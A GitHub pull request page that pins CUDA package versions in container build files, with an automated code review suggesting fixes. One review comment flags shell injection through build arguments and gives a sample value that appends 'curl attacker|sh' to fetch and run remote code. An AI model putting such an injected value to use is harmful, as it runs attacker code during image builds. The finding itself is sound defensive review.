Pin unpinned CUDA packages for reproducible builds (#162)#203
Pin unpinned CUDA packages for reproducible builds (#162)#203smoparth wants to merge 1 commit intoopendatahub-io:mainfrom
Conversation
Pin cuda-cupti, libcusparselt0, and libcudss0 with explicit versions sourced from NVIDIA's RPM repository. These ODH-specific packages were previously installed without version pins, making builds non-reproducible. - Add NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION build args to template and all 5 app.conf files (12.8–13.2) - Document why cuda-compat is intentionally left unpinned (NVIDIA's forward-compatibility design for GPU driver compatibility) - Add new keys to generate-containerfile.sh so future versions get TODO markers cuda-toolkit meta-package is left as-is; replacing it with granular packages requires a dependency audit and should be a separate issue.
📝 WalkthroughWalkthroughThis pull request introduces three new build argument parameters (NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION) across CUDA container definitions for versions 12.8, 12.9, 13.0, 13.1, and 13.2. The Containerfile.cuda.template and corresponding individual Containerfiles are updated to declare these arguments and replace unversioned or partially-versioned package references with explicit version-suffixed package installation strings. Configuration files (app.conf) for each CUDA version supply the specific version values for these arguments. The build script that generates Containerfiles was updated to include these keys in its TODO-comment logic. Estimated Code Review Effort🎯 2 (Simple) | ⏱️ ~12 minutes IssuesNo actionable issues identified. The changes follow consistent, repetitive patterns across multiple files with identical structural transformations. Version pinning improves reproducibility and supply chain control. All build argument declarations are properly propagated through template and individual Containerfiles. 🚥 Pre-merge checks | ✅ 2✅ Passed checks (2 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. Comment |
There was a problem hiding this comment.
Actionable comments posted: 1
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
cuda/12.8/Containerfile (1)
112-120:⚠️ Potential issue | 🟠 MajorUnbounded
dnf upgradekeeps this image non-reproducible.Line 117 upgrades the whole base at build time, so resulting package versions drift across builds even when newly pinned CUDA subpackages stay fixed.
Suggested fix (deterministic by default)
+ARG DNF_UPGRADE=0 RUN --mount=type=cache,target=/var/cache/dnf,sharing=locked,id=odh-base-containers-cuda-dnf \ - dnf upgrade -y --setopt=keepcache=1 && \ + if [ "${DNF_UPGRADE}" = "1" ]; then dnf upgrade -y --setopt=keepcache=1; fi && \ dnf install -y --setopt=keepcache=1 \ cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} \ cuda-compat-${CUDA_MAJOR_MINOR}As per coding guidelines,
**: REVIEW PRIORITIES: 3. Bug-prone patterns and error handling gaps.🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@cuda/12.8/Containerfile` around lines 112 - 120, The RUN currently performs an unpinned "dnf upgrade -y" which makes the image non-reproducible; remove the unbounded upgrade and only install the explicit CUDA packages with pinned versions instead. Concretely, delete "dnf upgrade -y --setopt=keepcache=1 && \" from the RUN line and keep a single "dnf install -y --setopt=keepcache=1 cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} cuda-compat-${CUDA_MAJOR_MINOR}" (or expand to list and pin any additional OS packages you need) so only known, deterministic package versions are installed rather than upgrading the entire base. Ensure the change targets the RUN that references cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} and cuda-compat-${CUDA_MAJOR_MINOR}.
🧹 Nitpick comments (1)
scripts/generate-containerfile.sh (1)
255-260: Ensure missing NVIDIA keys are inserted, not only annotated.The loop only adds TODO comments for existing keys. If a source
app.confis missing one of these new keys, generation silently skips it and leaves the new version under-specified.Suggested hardening
for key in "${nvidia_keys[@]}"; do - # Add TODO comment before each NVIDIA-specific key (if not already present) - if grep -q "^${key}=" "${new_conf}" && ! grep -B1 "^${key}=" "${new_conf}" | grep -q "# TODO: update from NVIDIA"; then - sed -i "/^${key}=/s/^/# TODO: update from NVIDIA\n/" "${new_conf}" - fi + if grep -q "^${key}=" "${new_conf}"; then + # Add TODO comment before each NVIDIA-specific key (if not already present) + if ! grep -B1 "^${key}=" "${new_conf}" | grep -q "# TODO: update from NVIDIA"; then + sed -i "/^${key}=/s/^/# TODO: update from NVIDIA\n/" "${new_conf}" + fi + else + { + echo "# TODO: update from NVIDIA" + echo "${key}=" + } >> "${new_conf}" + fi doneAs per coding guidelines,
**: REVIEW PRIORITIES: 3. Bug-prone patterns and error handling gaps.🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@scripts/generate-containerfile.sh` around lines 255 - 260, The current loop only annotates existing NVIDIA keys in new_conf and ignores keys missing from the source; update the loop that iterates over nvidia_keys to also insert missing keys into new_conf (not just add a comment) by checking presence with grep for "^${key}=" and if absent appending a TODO comment plus a placeholder entry (e.g., "# TODO: update from NVIDIA" followed by "${key}=" or a default value) into new_conf so the generated config is explicit; keep the existing branch that prepends the TODO comment when the key exists (the code around the for loop, nvidia_keys, new_conf, and the sed/grep checks).
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@Containerfile.cuda.template`:
- Around line 22-25: The Dockerfile/template declares build args
NV_CUDA_CUPTI_VERSION, NV_CUDNN_VERSION, NV_LIBCUSPARSELT_VERSION, and
NV_LIBCUDSS_VERSION and then directly interpolates them into a shell command
(the dnf install invocation), which allows shell metacharacter injection; fix by
validating/sanitizing those ARG values before any shell expansion: add a short
validation step (e.g., a shell snippet using a strict regex like
/^[A-Za-z0-9._+-]+$/) that checks each of NV_CUDA_CUPTI_VERSION,
NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION (and NV_CUDNN_VERSION if used
similarly) and exits the build with an error if validation fails, or
alternatively switch to using these as literal package names passed without
shell expansion (e.g., pass them into a non-interpolated form or use
--define/--arg-safe mechanism) so no untrusted characters can be executed;
ensure the check/validation appears before the dnf install/command that
interpolates ${NV_CUDA_CUPTI_VERSION}, ${NV_LIBCUSPARSELT_VERSION}, and
${NV_LIBCUDSS_VERSION}.
---
Outside diff comments:
In `@cuda/12.8/Containerfile`:
- Around line 112-120: The RUN currently performs an unpinned "dnf upgrade -y"
which makes the image non-reproducible; remove the unbounded upgrade and only
install the explicit CUDA packages with pinned versions instead. Concretely,
delete "dnf upgrade -y --setopt=keepcache=1 && \" from the RUN line and keep a
single "dnf install -y --setopt=keepcache=1
cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION}
cuda-compat-${CUDA_MAJOR_MINOR}" (or expand to list and pin any additional OS
packages you need) so only known, deterministic package versions are installed
rather than upgrading the entire base. Ensure the change targets the RUN that
references cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} and
cuda-compat-${CUDA_MAJOR_MINOR}.
---
Nitpick comments:
In `@scripts/generate-containerfile.sh`:
- Around line 255-260: The current loop only annotates existing NVIDIA keys in
new_conf and ignores keys missing from the source; update the loop that iterates
over nvidia_keys to also insert missing keys into new_conf (not just add a
comment) by checking presence with grep for "^${key}=" and if absent appending a
TODO comment plus a placeholder entry (e.g., "# TODO: update from NVIDIA"
followed by "${key}=" or a default value) into new_conf so the generated config
is explicit; keep the existing branch that prepends the TODO comment when the
key exists (the code around the for loop, nvidia_keys, new_conf, and the
sed/grep checks).
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Central YAML (base), Organization UI (inherited)
Review profile: CHILL
Plan: Pro Plus
Run ID: ea7da75c-da5a-4271-9230-d1bca0ce8b57
📒 Files selected for processing (12)
Containerfile.cuda.templatecuda/12.8/Containerfilecuda/12.8/app.confcuda/12.9/Containerfilecuda/12.9/app.confcuda/13.0/Containerfilecuda/13.0/app.confcuda/13.1/Containerfilecuda/13.1/app.confcuda/13.2/Containerfilecuda/13.2/app.confscripts/generate-containerfile.sh
| ARG NV_CUDA_CUPTI_VERSION | ||
| ARG NV_CUDNN_VERSION | ||
| ARG NV_LIBCUSPARSELT_VERSION | ||
| ARG NV_LIBCUDSS_VERSION |
There was a problem hiding this comment.
🧩 Analysis chain
🏁 Script executed:
#!/bin/bash
set -euo pipefail
echo "Locate all NV_* interpolations introduced in dnf install lines:"
rg -n 'cuda-cupti-\$\{CUDA_MAJOR_MINOR\}-\$\{NV_CUDA_CUPTI_VERSION\}|libcusparselt0-\$\{NV_LIBCUSPARSELT_VERSION\}|libcudss0-cuda-\$\{CUDA_MAJOR\}-\$\{NV_LIBCUDSS_VERSION\}' Containerfile.cuda.template cuda/*/Containerfile
echo
echo "Check whether allowlist validation exists for these args (expected: no matches before fix):"
rg -n 'Invalid NV_\* version|grep -E.*NV_(CUDA_CUPTI|LIBCUSPARSELT|LIBCUDSS)_VERSION|case .*NV_(CUDA_CUPTI|LIBCUSPARSELT|LIBCUDSS)_VERSION' Containerfile.cuda.template cuda/*/ContainerfileRepository: opendatahub-io/base-containers
Length of output: 1820
Validate NV_* build args before shell expansion (CWE-77/CWE-88, Major).
Lines 171–173 interpolate ${NV_CUDA_CUPTI_VERSION}, ${NV_LIBCUSPARSELT_VERSION}, and ${NV_LIBCUDSS_VERSION} directly into the dnf install command without validation. Since build args are externally overridable, hostile or malformed values can inject shell metacharacters during image build.
Exploit: NV_LIBCUDSS_VERSION='0.7.1.4-1;curl attacker|sh' executes arbitrary code in the build environment.
Remediation (apply to template, regenerate Containerfiles)
RUN --mount=type=cache,target=/var/cache/dnf,sharing=locked,id=odh-base-containers-cuda-dnf \
+ set -euo pipefail; \
+ for v in "${NV_CUDA_CUPTI_VERSION}" "${NV_LIBCUSPARSELT_VERSION}" "${NV_LIBCUDSS_VERSION}"; do \
+ printf '%s\n' "${v}" | grep -Eq '^[0-9][0-9A-Za-z._:+~-]*$' || { \
+ echo "Invalid NV_* version value: ${v}" >&2; exit 1; \
+ }; \
+ done; \
dnf install -y --setopt=keepcache=1 \
cuda-cupti-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUPTI_VERSION} \
libcusparselt0-${NV_LIBCUSPARSELT_VERSION} \
libcudss0-cuda-${CUDA_MAJOR}-${NV_LIBCUDSS_VERSION}Also affects: lines 22–25, 60–63 (ARG declarations); generated Containerfiles cuda/13.2, 13.1, 13.0, 12.9, 12.8.
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@Containerfile.cuda.template` around lines 22 - 25, The Dockerfile/template
declares build args NV_CUDA_CUPTI_VERSION, NV_CUDNN_VERSION,
NV_LIBCUSPARSELT_VERSION, and NV_LIBCUDSS_VERSION and then directly interpolates
them into a shell command (the dnf install invocation), which allows shell
metacharacter injection; fix by validating/sanitizing those ARG values before
any shell expansion: add a short validation step (e.g., a shell snippet using a
strict regex like /^[A-Za-z0-9._+-]+$/) that checks each of
NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION (and
NV_CUDNN_VERSION if used similarly) and exits the build with an error if
validation fails, or alternatively switch to using these as literal package
names passed without shell expansion (e.g., pass them into a non-interpolated
form or use --define/--arg-safe mechanism) so no untrusted characters can be
executed; ensure the check/validation appears before the dnf install/command
that interpolates ${NV_CUDA_CUPTI_VERSION}, ${NV_LIBCUSPARSELT_VERSION}, and
${NV_LIBCUDSS_VERSION}.
|
/retest |
Pin cuda-cupti, libcusparselt0, and libcudss0 with explicit versions sourced from NVIDIA's RPM repository. These ODH-specific packages were previously installed without version pins, making builds non-reproducible.
cuda-toolkit meta-package is left as-is; replacing it with granular packages requires a dependency audit and should be a separate issue.
Description
How Has This Been Tested?
Merge criteria:
Summary by CodeRabbit